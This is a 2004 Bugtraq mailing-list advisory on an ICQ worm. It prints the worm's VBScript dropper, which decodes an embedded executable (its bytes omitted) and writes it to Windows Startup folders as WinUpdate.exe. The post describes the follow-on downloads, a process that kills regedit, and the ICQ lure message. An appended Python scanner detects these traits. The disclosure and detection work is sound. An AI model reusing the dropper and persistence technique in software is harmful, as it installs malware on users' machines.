Bugtraq mailing list archives

New ICQ WORM


From: "Rafel Ivgi, The-Insider" <theinsider () 012 net il>
Date: Tue, 24 Feb 2004 17:55:16 +0200

The new ICQ WORM... spreading by 2 exploits on
http://www.jokeworld.biz/index.html
and uses ICQ to download a .chm file that uses the latest .chm exploit.
The .chm file is downloaded as an ICQ sound wav file, to the ICQ sounds
directory.
The file iefucker.html from inside the .chm file is run.

iefucker.html
--------------------------CUT HERE------------------------------

<body><html>

<script language="vbs">



 jelmersArray = array( [embedded executable byte values omitted] )


win2k="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\WinUpdate.exe"
win2ok="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\WinUpdate.exe"
winxp="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\WinUpdate.exe"
winxpee="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\WinUpdate.exe"
win98="c:\windows\Start Menu\Programs\Startup\WinUpdate.exe"
win98ate="c:\windows\Start Menu\Programs\Startup\WinUpdate.exe"

Function toString(payloadArray)
For Each arrayElement In payloadArray
toString = toString & ChrB(arrayElement)
Next
End Function
Const adTypeBinary = 1
Const adTypeText = 2
Const adSaveCreateOverWrite = 2

set jelmer = CreateObject("Adodb.Stream")
jelmer.Type = adTypeText
jelmer.Open
jelmer.WriteText toString(jelmersArray)
jelmer.Position = 0
jelmer.Type = adTypeBinary
jelmer.Position = 2
bytearray = jelmer.Read
jelmer.Close

set malware = CreateObject("Adodb.Stream")
malware.Type = adTypeBinary
malware.Open
malware.Write bytearray
On Error Resume Next
malware.savetofile(win2k), adSaveCreateOverWrite
On Error Resume Next
malware.savetofile(win2ok), adSaveCreateOverWrite
On Error Resume Next
malware.savetofile(winxp), adSaveCreateOverWrite
On Error Resume Next
malware.savetofile(winxpee), adSaveCreateOverWrite
On Error Resume Next
malware.savetofile(win98), adSaveCreateOverWrite
On Error Resume Next
malware.savetofile(win9ate), adSaveCreateOverWrite
On Error Resume Next
malware.Close

</script>

</body></html>
--------------------------CUT HERE------------------------------

And then it writes:
c:\documents and settings\all users\start menu\startup\winupdate.exe
c:\windows\start menu\startup\winupdate.exe
c:\windows\all users\start menu\startup\winupdate.exe

The next time the computer starts it will be loaded and will download
another virus to these locations:

c:\documents and settings\<your user name>\local settings\temp\alsdfkj.exe
c:\documents and settings\<your user name>\local settings\temp\aptgetupd.exe

These files will create a "sysmon" folder inside the windows\system32
directory.

And this file
c:\windows\system32\sysmon\sysmon.exe
runs in the background, closing regedit if you want to deny it from
autorunning.

The worm uses ICQ to spread, sending the following message to all the contact
list:
http://www.jokeworld.biz :) LOL

* This worm possibly opens a shell; hacking was reported on infected
machine.
   This worm is raging in Israel these days.

Panda info team was notified.
Rafel Ivgi, The-Insider.
Thanks a lot to "the pull".
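
Added example (not part of the original post and not the worm's code): a Python static check for the dropper traits visible in iefucker.html above, namely a decimal byte array that decodes to an MZ/PE header, an Adodb.Stream object, a SaveToFile call, and a Startup-folder .exe target. The function names and the inert constructed sample are assumptions of this example.

```python
import re

# Decimal lists of 64+ values in array(...); whitespace around commas is allowed.
ARRAY_RE = re.compile(r"array\s*\(\s*((?:\d{1,3}\s*,\s*){63,}\d{1,3})\s*\)", re.I)
STREAM_RE = re.compile(r"CreateObject\s*\(\s*[\"']adodb\.stream[\"']\s*\)", re.I)
SAVE_RE = re.compile(r"\.savetofile\b", re.I)
# \s+ also matches a mail-wrapped "Start<newline>Menu".
STARTUP_RE = re.compile(r"start\s+menu\\(?:programs\\)?startup\\[^\"'\r\n]+\.exe", re.I)

def embedded_pe_arrays(text):
    """Return info on byte arrays that decode to a DOS/PE executable header."""
    hits = []
    for m in ARRAY_RE.finditer(text):
        values = [int(v) for v in re.split(r"\s*,\s*", m.group(1).strip())]
        if any(v > 255 for v in values):
            continue
        blob = bytes(values)
        if blob[:2] != b"MZ":
            continue
        e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")  # offset of PE header
        hits.append({"size": len(blob),
                     "pe_signature": blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"})
    return hits

def scan(text):
    """Check one HTML/VBS document for the dropper traits described in the post."""
    f = {
        "embedded_pe": embedded_pe_arrays(text),
        "adodb_stream": bool(STREAM_RE.search(text)),
        "save_to_file": bool(SAVE_RE.search(text)),
        "startup_targets": sorted({m.group(0).lower() for m in STARTUP_RE.finditer(text)}),
    }
    f["suspicious"] = bool(f["adodb_stream"] and f["save_to_file"]
                           and (f["embedded_pe"] or f["startup_targets"]))
    return f

def constructed_sample():
    """Constructed, inert input: 68 header bytes only, no executable code."""
    header = bytearray(68)
    header[0:2] = b"MZ"
    header[0x3C] = 64            # e_lfanew points just past the DOS header
    header[64:68] = b"PE\0\0"
    nums = ",".join(str(b) for b in header)
    return ('<script language="vbs">\nblob = array(' + nums + ')\n'
            'p = "C:\\Documents and Settings\\All Users\\Start\n'
            'Menu\\Programs\\Startup\\Example.exe"\n'
            'Set s = CreateObject("Adodb.Stream")\n'
            's.SaveToFile p, 2\n</script>')

if __name__ == "__main__":
    print(scan(constructed_sample()))
```

Byte lists whose numbers were split mid-value by mail line wrapping need to be re-joined before scanning.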

